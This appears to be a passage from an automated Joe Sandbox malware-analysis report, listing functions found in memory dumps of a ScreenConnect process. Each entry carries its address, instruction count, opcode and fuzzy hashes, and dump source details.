
Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4da5ff6c6a87aa1c21d0e621eacdea5cee25dbd2a289faea82f24c75c36412c
Instruction ID: cec363614a0d1846a30718528d4e5c9a739c788dbf87b2b50e15f0cb18997a87
Opcode Fuzzy Hash: a4da5ff6c6a87aa1c21d0e621eacdea5cee25dbd2a289faea82f24c75c36412c
Instruction Fuzzy Hash: D7415BB4A00B05CFCB60CF29DD44A6ABBF1FF84311B144A69E056DB7A5EB30E945CB91

Function 016D3678 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b22f7e5831c717fcea6cb330c64acfd344be5a8f27d02a356f11ecadacbf6db
Instruction ID: 62c13a041015b8884072e4d257a0520628dd0d3dbfadc4f489d6cebceb7010f4
Opcode Fuzzy Hash: 3b22f7e5831c717fcea6cb330c64acfd344be5a8f27d02a356f11ecadacbf6db
Instruction Fuzzy Hash: 28416DB4A00705CFCB64CF29DD44A6ABBF1FF88311B154A29E056DB7A4EB30E845CB91

Function 016D3DC0 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d49ab115d8b370a8194d1e1ca1e8a7df92e00a185e5d474440f2c65d8a8508cc
Instruction ID: df03255d1e4fc36a995e23f28449b47a46d1fbb6dd29f45319347b859947148f
Opcode Fuzzy Hash: d49ab115d8b370a8194d1e1ca1e8a7df92e00a185e5d474440f2c65d8a8508cc
Instruction Fuzzy Hash: 43318B31B002068BDB14DF69C854AAEFBF6FF89354F04846AE606E7394DB71DC058B91

Function 016D392C Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78351b29d34a30a5a6333a0ebd56b1ed8dd5053959c6cf9223fd83bebc48db7e
Instruction ID: 135d0fe576539adf5cd022a20de153723dcf72b0f1a68238be9ba9ef493da9b5
Opcode Fuzzy Hash: 78351b29d34a30a5a6333a0ebd56b1ed8dd5053959c6cf9223fd83bebc48db7e
Instruction Fuzzy Hash: 7B219F97C1F7C11ADB675B389C962E6BF58AA4263478D0896C2C48E75FF004918AC2B7

Function 016D3828 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07ea84f504248c2ebea318daf3a31f37328b3668785e944645124cd3565a0cb4
Instruction ID: 0c4af5b6c6b3386d557b6a3ac34f3fcfb1ca28b7ecd2aedecaeed4054cdb6fa6
Opcode Fuzzy Hash: 07ea84f504248c2ebea318daf3a31f37328b3668785e944645124cd3565a0cb4
Instruction Fuzzy Hash: 7531DC71F042458FCB05DBA8C8556AEBBB6FF85300B1580AAD509DB392EB319D05CB92

Function 016D5548 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b36c4865c03b843e0037179462a4953708e20241a1a516368e5922575e414cac
Instruction ID: d636425b2797cac855da1cc7ce1a0f448f6c4180b14e6ce84571a397d7f1daa6
Opcode Fuzzy Hash: b36c4865c03b843e0037179462a4953708e20241a1a516368e5922575e414cac
Instruction Fuzzy Hash: 7B312B74A007058FCB30CF29D88496AB7F2EF89321B144A2DD557DB7A5D730E945CB91

Function 016D3890 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8520c5fd36776532f7b60473e6c02173858520e90f0ecaa21d622d836d5c5f2
Instruction ID: 2619f7f9249adda429108bcaddbeb8515ca17c0f4941dc49fa675d3b2277b180
Opcode Fuzzy Hash: f8520c5fd36776532f7b60473e6c02173858520e90f0ecaa21d622d836d5c5f2
Instruction Fuzzy Hash: 3B21D2B5F005028FCB018B6CD9455AAFBB2FF88310B16816AD909DB355EB31DC05CB91

Function 016D5649 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c00e4d3c16394bb0dc7755fbc9606eb60673a4f7d0ebe7ed9e191c26b05d894
Instruction ID: f337e0427b96280dca69e75197a92596ac74f14a65cd70940621d6f8ede7cbb8
Opcode Fuzzy Hash: 8c00e4d3c16394bb0dc7755fbc9606eb60673a4f7d0ebe7ed9e191c26b05d894
Instruction Fuzzy Hash: 6B21F371E002949FEB11CE68ED005EABBB5EF80321F1884A6D545DB265D3718A42CB51

Function 016D5FB7 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddfa1e85cb281175aa557bdc1b3bbb5806486d7dfe6fefe8d2d48a33b1094f79
Instruction ID: fba177fccce82d0fa56e2119a63f18d70d56da1e91b458d4fff4bbc358fbca5d
Opcode Fuzzy Hash: ddfa1e85cb281175aa557bdc1b3bbb5806486d7dfe6fefe8d2d48a33b1094f79
Instruction Fuzzy Hash: 3A11E636B006018FC7218A5DDE45A66BBF79FC5615728C5AAE16ACFB55EB30DC028B40

Function 016D50C1 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f49f6124037a69f202059bf24f958d86b93abe4305f674871613da6440709c5
Instruction ID: 573e27a7deb2e3a580cb08b1c66f5531c0b139d062a4de2b43b877c80a37fc5b
Opcode Fuzzy Hash: 7f49f6124037a69f202059bf24f958d86b93abe4305f674871613da6440709c5
Instruction Fuzzy Hash: DF1193757001025FD705EB78DC50A6EBBA6FFC8250F50852AD5059F364DF70AD0ACB91

Function 016D4B70 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8c6364fe26987270811208a79a9f4e201c5aa0dc0ca63e192fbde9504d50fc4
Instruction ID: fbb1a83cfc77e573cc82d2b8f50520b6e4afd0185497e32de512105584c169cd
Opcode Fuzzy Hash: e8c6364fe26987270811208a79a9f4e201c5aa0dc0ca63e192fbde9504d50fc4
Instruction Fuzzy Hash: 6F212F306006058FCB34CF2ADC48696BBF1EF44311B148A2DD59697AA5DB31E98ACF80

Function 016D50D0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8d660cdf0d4909505e5e6903f5cc0489303bd7709e991f33f076812406892e9
Instruction ID: 6119e37f1b162ebe46391ef3665417a6579f46cc74524b93476c227662735495
Opcode Fuzzy Hash: e8d660cdf0d4909505e5e6903f5cc0489303bd7709e991f33f076812406892e9
Instruction Fuzzy Hash: C511D3747001025BD704EB78DC40A6EBBE6FFC8240F40852AD5059B394DF70AD0ACBD1

Function 016D4F41 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd30b584e699763c34c871e972545b831c575c3ca8466e15ac122c5a1c50cbf2
Instruction ID: a105542ee3577aa17575382839d2d0391b0b21c9986dfe0553048765d7044363
Opcode Fuzzy Hash: bd30b584e699763c34c871e972545b831c575c3ca8466e15ac122c5a1c50cbf2
Instruction Fuzzy Hash: 1A11377690010ADFCF01DFA4D9809DEBBF5FF49304F148559E505BB265D731AA06CB90

Function 016D5658 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93fc20c381f3c28e9752166f62b46f720c7dfdbb2aa43dd328cac5826a7749d2
Instruction ID: e11f003cd808271c3a61f0ac6d4e00fc155c23bc2c444af605dec0ac22706602
Opcode Fuzzy Hash: 93fc20c381f3c28e9752166f62b46f720c7dfdbb2aa43dd328cac5826a7749d2
Instruction Fuzzy Hash: D6118B70F00259AFDB14DE69DC00AABBBBAAFC4310F18C46AE515D7264E7719A02CB90

Function 016D5035 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc63a015161adb99c84128cb3219e3b1db715d00c41836343a119fff0b0f3cac
Instruction ID: 76c68d4fcc8502429b6ddbeaf0812cd144a8046fa724987b4dbe1c225846d97d
Opcode Fuzzy Hash: dc63a015161adb99c84128cb3219e3b1db715d00c41836343a119fff0b0f3cac
Instruction Fuzzy Hash: 86113A3194005ADFCB01DFA8D9849DCBFB2FF85314B58C594E006AB529DB31E98BCBA1

Function 016D6E60 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da6091fdf66aa6d35ae0de9c4c3851cfb06649661cf82d6febc242f9311a0e9b
Instruction ID: 95cb8a8021d9204583e775874592662afc58674528afcc5ee313e073fd5d8615
Opcode Fuzzy Hash: da6091fdf66aa6d35ae0de9c4c3851cfb06649661cf82d6febc242f9311a0e9b
Instruction Fuzzy Hash: 24017171F442119F8B558E69E8444ABBBEAFBC82243158A7AE515DB311DBB19C068BC0

Function 016D35E0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca6b2b25bd9de3b509e0e87c0987a78d2404290f173a3b17b655319bf7a1105c
Instruction ID: 6ffe1c42459d9b02636103064cdcf00f6ec286a3d03abce34c9599947313f909
Opcode Fuzzy Hash: ca6b2b25bd9de3b509e0e87c0987a78d2404290f173a3b17b655319bf7a1105c
Instruction Fuzzy Hash: EF018FB5B402129FCB159B6DAC440ABBBE6FBD42543104A3AE44AC7720EE75894A8BC1

Function 016D4F50 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a77dd2b523c926c79db0524a5c93982520c0e7384e700537ca278b6b13a0322
Instruction ID: 7e596d8d3bc2d4a967eb1b3f4227d537f581a6ce0b9ca7682eeef514031e92c7
Opcode Fuzzy Hash: 2a77dd2b523c926c79db0524a5c93982520c0e7384e700537ca278b6b13a0322
Instruction Fuzzy Hash: C011163590010A9FCF01DFA8D9409DEBBF5FF49314B108559EA09BB265D771AA05CB90

Function 016D4B61 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd1b6536e7354c25f9c3155ffd4070790411fd73dfa6c278f0c1134da5bd79f3
Instruction ID: 75aaff238951fdf58a2799f1da69db788f2a73a43c9d04ecede5bb8e37545db5
Opcode Fuzzy Hash: dd1b6536e7354c25f9c3155ffd4070790411fd73dfa6c278f0c1134da5bd79f3
Instruction Fuzzy Hash: B701D236A04204DFCB11CF74D945ADABBF1EF08314F14849EC546ABA51CB73E846CB80

Function 015FD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931523432.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15fd000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0db3d674d3e66af1bef035ef3035f8df2db9e676640fd34cb585a2f6ab6ce86
Instruction ID: f726e33704a16a0cea48d304dc235c90e6b2890f4621296c27fe422aff4d3ea0
Opcode Fuzzy Hash: b0db3d674d3e66af1bef035ef3035f8df2db9e676640fd34cb585a2f6ab6ce86
Instruction Fuzzy Hash: 6A012B310083009AE7118A6ACD8476BBFECFF413A4F08C92EEE080F186D279D845C6B1

Function 015FD006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931523432.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15fd000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59b4ca1e74399a4eb8cfe98cbaf19e34a81150dd978cd35255e06d9ca6d3ea92
Instruction ID: e1d6ccb83e396e2394da4acaef2155adddfad62714d2b8ea2aed92e173691123
Opcode Fuzzy Hash: 59b4ca1e74399a4eb8cfe98cbaf19e34a81150dd978cd35255e06d9ca6d3ea92
Instruction Fuzzy Hash: 53012D7110E3C09FD7128B298894656BFB8EF43264F19C4DBD9888F1A3D2699849C772

Function 016D4FDB Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58b5742d15dc6ba448383726d772ba251ab4426a03d94af81075b8d2fc6d5846
Instruction ID: 3561cebadea6ee6b477a89148f677b399ee67068eb288900d0101a3e8d9293dd
Opcode Fuzzy Hash: 58b5742d15dc6ba448383726d772ba251ab4426a03d94af81075b8d2fc6d5846
Instruction Fuzzy Hash: 05015A32D0011AEBCB04DFA8E8408DDBFF6FF89314F04856AE505B7624DB306956CB90

Function 016D8168 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27af6aaa560cf3f8d3f3b32e29bdce89feef05275b2df2251810d04a47aab190
Instruction ID: 3bf4e684215ab2558ed3f935060d8ab6aa1e00635fdb7b24e3fa8913570419cf
Opcode Fuzzy Hash: 27af6aaa560cf3f8d3f3b32e29bdce89feef05275b2df2251810d04a47aab190
Instruction Fuzzy Hash: 53F05836B082146AD728CABAA80069BBBDECBC4624B14807FE59DC3780E931A4018765

Function 016D12A0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 021590019902d96018e8f949989f046e473ba36bf527493c2ce799ff9a1e777f
Instruction ID: fac7803ff09e6f4861c8f6c785c2455eafe5092e78881ac9f08c724fee86ea18
Opcode Fuzzy Hash: 021590019902d96018e8f949989f046e473ba36bf527493c2ce799ff9a1e777f
Instruction Fuzzy Hash: F8F0F0316002408FC3139B6CAC1049B3BA6EEC6210300816ED562DB351DB789C068BC0

Function 016D1414 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6522e100a14500b428ddc2d598fa77049a485fd9d73ec612bd3c19216c3c3939
Instruction ID: 563ef669ff01952bf9f624f9be54871ae2d4f08076064c22bccf8a6d3972d13c
Opcode Fuzzy Hash: 6522e100a14500b428ddc2d598fa77049a485fd9d73ec612bd3c19216c3c3939
Instruction Fuzzy Hash: 0BF024724083808FD312DB7DE8202997FE1EEA321030545EFC142CF276EBAAE94AC751

Function 016D6EE8 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91abe7977ff256580b126f587c2fa9e1d781087112bc8107605bdd445ed92743
Instruction ID: 38e633c9b41bcae0b8e8b619e99e44ea5a1ec291293a7fa606b806b390dd27e4
Opcode Fuzzy Hash: 91abe7977ff256580b126f587c2fa9e1d781087112bc8107605bdd445ed92743
Instruction Fuzzy Hash: 50F0A7317043404FCB151B69BC5402A7FBAFBCA67535544BEEA09CB351CE319C8987A1

Function 016D5F68 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39c144299f94891c693e0938d23a89842c141e206676dccad10950a2ad59377e
Instruction ID: 4c6403367e014da9540bedc55012ea495b644fbfecf1146282c60b7d888cc2e2
Opcode Fuzzy Hash: 39c144299f94891c693e0938d23a89842c141e206676dccad10950a2ad59377e
Instruction Fuzzy Hash: 29F09237F019418FC7515A2CAD45495BFF69E5A22A33D8AE2F026CF762E621CC068F52

Function 016D8160 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a915a0c649767d8c5d5b003cce19f10272c2985602a63f856bb36f4310024dd
Instruction ID: 95ea0cf3d3f8ebe75793f847b536dfdcde327ab156dbd8044c8012607a1b09c3
Opcode Fuzzy Hash: 9a915a0c649767d8c5d5b003cce19f10272c2985602a63f856bb36f4310024dd
Instruction Fuzzy Hash: 60E09236A082106BC714DABAAC0069B7BDECB84224B00C07EA55DC3240E931D50587A5

Function 016D12B0 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c18923dfd2bcb7ea2c94fb86abbe8518090dda77b45ae77dae217918c82014fd
Instruction ID: 535083ecaee29bea81568332186c1ebadeb381a9161e041eba6955401cde19bf
Opcode Fuzzy Hash: c18923dfd2bcb7ea2c94fb86abbe8518090dda77b45ae77dae217918c82014fd
Instruction Fuzzy Hash: 7CF0A935B402008F8316AA6EAC1095F7BAAEAC4650700813EEA26CB344EF78EC058BC0

Function 016D1DA0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b9355bdb94398a18c009fe0f05a99dc41c08a2d4c2f45c03a253f77bd0f7ace
Instruction ID: 6e984290736ead4a06aaa5d1860e552b861c48c67977e8a3274ab3e71aada3a6
Opcode Fuzzy Hash: 1b9355bdb94398a18c009fe0f05a99dc41c08a2d4c2f45c03a253f77bd0f7ace
Instruction Fuzzy Hash: 49F030363443505FC3466778EC1845E3FE5EFCA16531441ABE606CB2E6CE318C16CB91

Function 016D6EF8 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 929253d492d8e77d4e318648898ef1a8809efddf52746be14e726ae5af807e00
Instruction ID: 97ae354e5aa4a7fa383824c08d2c612248101a2570b931276778c90e348e6223
Opcode Fuzzy Hash: 929253d492d8e77d4e318648898ef1a8809efddf52746be14e726ae5af807e00
Instruction Fuzzy Hash: 24E04F35B00310579B186AAEA88853BBAEEFBC8676755403EF60EC7340DE719C0987A5

Function 016D0838 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f04823e41b79fc292fef070499f371ffb1671a87bb684b62a399df810f8a2a9c
Instruction ID: 6ad5fde98e3207766a92dd4e664bb82808d6fdd06a2e336a7ea70b26ca9a4d68
Opcode Fuzzy Hash: f04823e41b79fc292fef070499f371ffb1671a87bb684b62a399df810f8a2a9c
Instruction Fuzzy Hash: 33F08570D05205EFDB65DF68EC01AAEB7A5EB90304B1042AEA4099B252D6318A11EB41

Function 016D5F78 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bedb888fae03caa5fc1abba373613a3757ca63f4791f47c83894aab3371c7e9
Instruction ID: bd447d53bd2dcd33720098f705e0aea6dfdd5d3f5361160e48e27607c94c1f01
Opcode Fuzzy Hash: 3bedb888fae03caa5fc1abba373613a3757ca63f4791f47c83894aab3371c7e9
Instruction Fuzzy Hash: 3EE08633F014515B8B10951C9D45555B7EA8B8926573D85B1F52ACFB41FA21DC424F81

Function 016D13D1 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c79db459d54a43e648c22ba1a7b51d8c680b9c2b129a647f29598a120ec0d9c
Instruction ID: f67719110cb1e32033d90247688ca4fe0f42260fd93721acb8f08e5f69d3d4ba
Opcode Fuzzy Hash: 7c79db459d54a43e648c22ba1a7b51d8c680b9c2b129a647f29598a120ec0d9c
Instruction Fuzzy Hash: FFE092321087418FC312EB3DF400288BFE1AF9222471445EED1458B226DB66AD498791

Function 016D1DF9 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a99cf60bbed77ea3abaa14375b40b6fb9eb6eaea36a0eb54ddd15b8fdc20eda2
Instruction ID: 019fb2651169393ca8c28053daebe171852d077d296ace29bba50f75bd8b0676
Opcode Fuzzy Hash: a99cf60bbed77ea3abaa14375b40b6fb9eb6eaea36a0eb54ddd15b8fdc20eda2
Instruction Fuzzy Hash: AEE0D831915104EFC741CFF4EA421AD7FB0FF86204B2005DAD405DB261DA325E04DF81

Function 016D1310 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 681ed8ab7256c7c6a099496d8088f770bed39edb142e778de5cf570a87b39e54
Instruction ID: af5df5915c78bc7df4d0d5f9fd4b4bd869884cc6dbaa5ba032333ed8214bea2b
Opcode Fuzzy Hash: 681ed8ab7256c7c6a099496d8088f770bed39edb142e778de5cf570a87b39e54
Instruction Fuzzy Hash: EBE01A71D40208DF8B80DFB8D4011AABFF0EB1E214B2095AEC419D7211E7324502CF80

Function 016D1DB0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d2814c8baa1ea9ee10559cc7bf7ed13de7fdf11bf24de0f64e5bcdeca359467
Instruction ID: 0210e1a12d817b8e24fabd0887451736cda276afd45be998f5acd1e0227590cd
Opcode Fuzzy Hash: 7d2814c8baa1ea9ee10559cc7bf7ed13de7fdf11bf24de0f64e5bcdeca359467
Instruction Fuzzy Hash: 23E046363001105BC3146679E80C86F7AEAEBD9261320422AEA06C73D4CE708C128BA1

Function 016D1820 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec811c8bef405d51c4c523204e217984532790fac29e3944487fb68e72ff9589
Instruction ID: 12672412313d0853b99f92fd13692e1c5435ec8bb7ce353dfe740a12806dba8f
